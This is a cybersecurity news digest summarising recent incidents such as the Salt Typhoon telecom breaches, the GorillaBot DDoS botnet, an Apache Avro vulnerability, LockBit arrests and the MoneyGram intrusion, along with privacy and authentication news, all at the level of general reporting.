Daily Brief

Chinese espionage group Salt Typhoon reportedly infiltrated the networks of major US telecom providers Verizon, AT&T, and Lumen Technologies, potentially accessing wiretapping systems used for law enforcement surveillance. The breaches could have allowed unauthorized access to systems sharing domestic communication data with law enforcement, in addition to intercepting generic internet traffic across the US. Salt Typhoon's activities in these breaches, specifically whether systems used for foreign intelligence surveillance were compromised, remain unclear. The FBI, along with other agencies, are investigating the extent and nature of the data compromised by these intrusions. Questions about the breaches directed to the US Cybersecurity and Infrastructure Security Agency (CISA) were referred back to the affected providers, highlighting ongoing concerns around communication and transparency. Verizon reported a recent outage due to misconfiguration, not related to any cybersecurity breaches or the Salt Typhoon incident. Initial breach vectors are being investigated, with suspicions on compromised Cisco routers which have a history of exploitation in previous Chinese state-sponsored hacking attempts. FBI Director Christopher Wray has previously emphasized the extensive threat posed by Chinese state-sponsored cyber operations, noting the scale and impact on US security and data privacy.

Chinese hacking group, Salt Typhoon, breached multiple U.S. internet service providers including Verizon and AT&T, aiming to access U.S. government wiretapping data. The hackers, active since at least 2019, are known for targeting government entities and telecommunications sectors predominantly in Southeast Asia. The intrusion may have allowed unauthorized access to systems handling lawful U.S. network wiretapping requests for an indeterminate period. The true extent and type of data compromised are still under assessment by U.S. authorities and cybersecurity experts. Notable previous attacks by this group involved exploiting Microsoft Exchange Server vulnerabilities and deploying custom malware like SparrowDoor. Recent investigations suggest that Cisco routers may have been compromised in the attack, although Cisco has not confirmed involvement of their equipment as yet. U.S. service providers affected have generally not commented on the breach, with ongoing investigations by private and governmental bodies. This incident is part of a broader trend of Chinese APT groups increasingly targeting network infrastructure in the U.S. and Europe for cyberespionage.

Criminal IP has partnered with Hybrid Analysis to integrate advanced domain scanning into Hybrid Analysis's malware threat intelligence platform. This collaboration aims to provide security professionals with deeper insights and more effective threat mitigation strategies. Hybrid Analysis uses dynamic and static analysis techniques for comprehensive examination of malicious files, enhancing detection and response capabilities. Criminal IP's domain scanning leverages AI to monitor domains and URLs for phishing, malware hosting, and other threats, enriching threat profiles. The integration offers features such as AI-powered phishing detection and malicious link identification to improve the accuracy of threat detection. Users can access detailed information on technology usage, abuse records, and CVE vulnerabilities through Criminal IP's expanded database. This collaboration follows AI SPERA's expansion in the CTI solutions sector, with Criminal IP launching in 2023 and partnering with major global security firms. The service, supporting multiple languages, aims to serve a diverse global audience, emphasizing user-friendly interfaces and comprehensive data analysis.

Global losses due to insecure APIs and bot attacks range between $94 billion to $186 billion annually, significantly impacting businesses worldwide. API-related security incidents have increased by 40% in 2022, with an additional 9% rise in 2023, indicating a growing threat landscape. Bot-driven attacks surged by 88% in 2022 and 28% more in 2023, influenced by factors like digital transaction increases and geopolitical tensions. Large enterprises, especially those with over $1 billion in annual revenue, are two to three times more likely to suffer from automated API abuse. Bots frequently exploit business logic vulnerabilities in APIs, leading to substantial financial losses estimated up to $17.9 billion annually. Imperva stresses the urgent need for businesses to adopt robust security measures against these threats to avoid devastating financial and reputational damage.

The rise of hybrid work and increased digitization are major factors driving the shift towards passwordless authentication systems. Traditional password systems are vulnerable to security threats such as phishing and identity theft, prompting the consideration of passwordless solutions. Difficulties in remembering multiple passwords lead to security risks, as users often reuse passwords across various systems. Passwordless methods like biometrics and multi-factor authentication enhance both data security and user satisfaction, but come with their own set of challenges. The upcoming webinar titled "Modernization of Authentication: Passwords vs Passwordless and MFA" will feature insights from James Azar, CISO, and Darren James, Sr. Product Manager at Specops Software. The webinar aims to provide best practices for modern security and authentication, addressing the increased need for reliable data protection in the face of growing cyber threats and evolving compliance standards. Attendees will learn how to improve security measures effectively, maintaining productivity for both in-office and remote teams.

Cybersecurity firm NSFOCUS identified a new botnet called Gorilla, derived from Mirai source code, which orchestrated over 300,000 DDoS attacks between September 4 and 27, 2024. GorillaBot targeted a diverse set of sectors including universities, government entities, telecoms, banks, and the gaming industry across more than 100 countries, notably impacting China, the U.S., Canada, and Germany. The botnet primarily utilized DDoS attack methods such as UDP flood, ACK BYPASS flood, VSE flood, SYN flood, and ACK flood, leveraging the connectionless nature of the UDP protocol to enable spoofing and generate significant traffic. Gorilla supports multiple CPU architectures and connects to one of five pre-set command-and-control (C2) servers to receive instructions for DDoS attacks. The malware includes functionalities to exploit a known vulnerability in Apache Hadoop YARN RPC for remote code execution—a tactic previously exploited as early as 2021. Persistence is ensured via the creation of a 'custom.service' in the system's service directory to automatically execute a malicious shell script from a remote server at every system start-up. It employs encryption methods associated with the Keksec group and uses advanced techniques to remain undetectable and maintain control over IoT devices and cloud hosts. This extensive and sophisticated attack underlines the evolving threat landscape and the increasing capability of emerging botnets.

A severe vulnerability has been identified in the Apache Avro Java SDK, detailed as CVE-2024-47561, impacting all versions prior to 1.11.4. The flaw permits remote code execution if attackers exploit configurations allowing user-defined Avro schema parsing. Users are advised to promptly upgrade to Apache Avro versions 1.11.4 or 1.12.0, where the issue has been resolved. Kostya Kortchinsky of the Databricks security team discovered this vulnerability, highlighting the serious threat posed by unsanitized schema parsing. Mitigation strategies include the sanitation of schemas before parsing and the avoidance of parsing schemas provided by users. Mayuresh Dani from Qualys emphasized the risk, noting no publicly available PoC but potential exploits via ReflectData and SpecificData in package processing. The widespread usage of Apache Avro, especially in U.S. organizations, underscores the critical need for timely updates to prevent unauthorized code execution.

Google is piloting a new security measure in India to automatically block the sideloading of potentially unsafe Android apps, following tests in Singapore, Thailand, and Brazil. This initiative aims to protect users from installing malicious apps from sources outside the Google Play Store, such as web browsers, messaging apps, and file managers. The security feature was first launched in Singapore in February, successfully blocking nearly 900,000 high-risk app installations. The feature functions by analyzing real-time permissions requested by third-party apps, specifically targeting permissions often misused for financial fraud. Google Play Protect intervenes to prevent app installation if it detects permission requests in the app’s manifest that are typical in malicious operations. The pilot is set to begin next month and will eventually be available on all Android devices in India with Google Play services. Developers affected by this initiative are advised by Google to review their apps’ permission requests to align with best practices. This development extends Google's efforts initiated last year with the DigiKavach program aimed at curbing online financial fraud in India.

International law enforcement agencies collaboratively targeted the LockBit ransomware operation, resulting in the arrest of four individuals and the dismantling of nine servers. Authorities exposed Aleksandr Ryzhenkov, a Russian national and a high-ranking member of the notorious Evil Corp cybersecurity group, with ties to LockBit. The UK has sanctioned 16 members of the Evil Corp group, increasing pressure on cybercriminal activities. The article emphasizes the importance of maintaining a Software Bill of Materials (SBOM) to manage third-party components and open-source libraries effectively. Regular updates and education on software components are stressed as crucial in minimizing security risks and enhancing quick response to vulnerabilities. The roundup highlights dynamic and varied cybersecurity challenges, including scams, malware, and deceptive practices in app stores. The overarching advice from the cybersecurity recap is to stay vigilant and informed about the ingredients of your software to better safeguard against potential threats.

A significant portion of British citizens feel overwhelmed by constant requests for cookie permissions and privacy consents, often resulting in passive compliance. This public weariness is exacerbated by complicated and obtrusive consent mechanisms that big tech firms use, which tend to discourage user engagement and understanding. Current data protection laws like the EU’s ePrivacy Directive and GDPR offer choices theoretically, but in practice, they fall short as they fail to counteract the fatigue experienced by users. The frequent and repetitive nature of cookie consent requests has led to widespread user apathy, contributing to ineffective data protection practices. An innovative solution suggested involves standardizing cookie consents through an API that would allow users to set default privacy preferences across services. This approach not only streamlines the user experience but also aligns with the principle of personal data protection and potentially eases the burden on site and service creators. Standardizing cookie consent management through API integration could enhance compliance monitoring and enforcement by regulators and activists.

The Court of Justice of the European Union (CJEU) ruled that Meta Platforms must limit the use of personal data from Facebook for targeted ads, even with user consent. This decision is aimed at ensuring compliance with the General Data Protection Regulation (GDPR), which advocates for data minimization. GDPR Article 5(1)(c) requires companies to restrict data processing to only what is strictly necessary, prohibiting indefinite use of aggregated personal data for ads. The case originated from privacy activist Maximilian Schrems, who challenged Meta's use of personalized ads based on sensitive personal information. The ruling emphasizes that consent for personalized advertising does not allow indefinite use of a person's data and applies to all online advertising entities lacking strict data deletion protocols. Meta responded by stating it has invested in embedding privacy into its products, ensuring sensitive categories of data aren't used for personalizing ads. The ruling could significantly impact other ad-driven businesses within the EU regarding how they handle and process personal data for advertising.

Financial Business and Consumer Solutions (FBCS), a U.S. debt collection agency, experienced a data breach between February 14 and February 26, 2024, impacting multiple companies including Comcast and Truist Bank. Initially estimated at 1.9 million affected individuals, the number of compromised records escalated to 4.2 million by July after further investigation. Comcast disclosed that 273,703 of its customers had sensitive information such as Social Security numbers and account details exposed, and offered them 12 months of identity theft protection. Truist Bank also notified its customers of the breach, indicating varied types of exposed data including names, account numbers, and Social Security numbers; the total number of affected customers remains undisclosed. FBCS's financial troubles worsened following the breach, complicating the notification and remediation process for impacted businesses. The ongoing internal investigation at FBCS signals potential future revelations concerning the extent and details of the data compromise.

Evan Frederick Light, a 21-year-old from Indiana, pleaded guilty to stealing $37,704,560 in cryptocurrency from 571 victims during a 2022 cyberattack. The theft targeted an unnamed investment holdings company in Sioux Falls, South Dakota, where Light, along with unknown co-conspirators, impersonated a legitimate client to gain server access. After infiltrating the servers, they exploited vulnerabilities within the network to access and steal personal information of the company's clients, subsequently using this data to steal cryptocurrencies held by these clients. The stolen funds were laundered through various coin-mixing services and gambling websites to obscure their origin and conceal the identities of the perpetrators. Despite attempts to hide the illegal activities, the FBI was able to track down and arrest Evan Light, leading to his indictment in May 2023. Light now faces up to 20 years of imprisonment per count, three years of supervised release, and potential restitution, although the recovery of the stolen funds remains uncertain. The FBI highlighted a record $5.6 billion in cryptocurrency losses in 2023, emphasizing the importance of using secure practices such as cold wallets and multi-factor authentication to protect digital assets.

Google Pay mistakenly sent emails to users stating a "new card" had been added to their accounts. The notifications referred to old, often expired cards which significantly confused recipients. Many recipients voiced concerns on social media and Google's forums, fearing their accounts had been compromised. Users across the platform, including individuals who had received multiple notifications, expressed fears of hacking. Google later clarified that the emails were sent accidentally and assured there was no security breach. Users were advised that no action was needed and their account information was secure. Google apologized for the error and any resulting inconvenience, reinforcing the importance of regular review of account payment methods.

MoneyGram experienced a significant cyberattack leading to a five-day service outage starting September 20. The attack caused disruptions, preventing customers from accessing or transferring money and conducting online activities. Despite initial suspicions, investigations confirmed that ransomware was not the cause of the incident. Cybersecurity firm CrowdStrike and law enforcement were involved in investigating and restoring systems. Systems were only brought back online after implementing heightened security measures; most services have resumed. The intrusion was attributed to a social engineering attack targeting MoneyGram’s internal help desk, which compromised employee credentials. The attackers targeted employee information within MoneyGram’s Windows Active Directory Services but were detected and blocked before further damage could occur. MoneyGram has not publicly blamed any specific group for the attack; however, the method resembles those used by hacker group Scattered Spider in other incidents.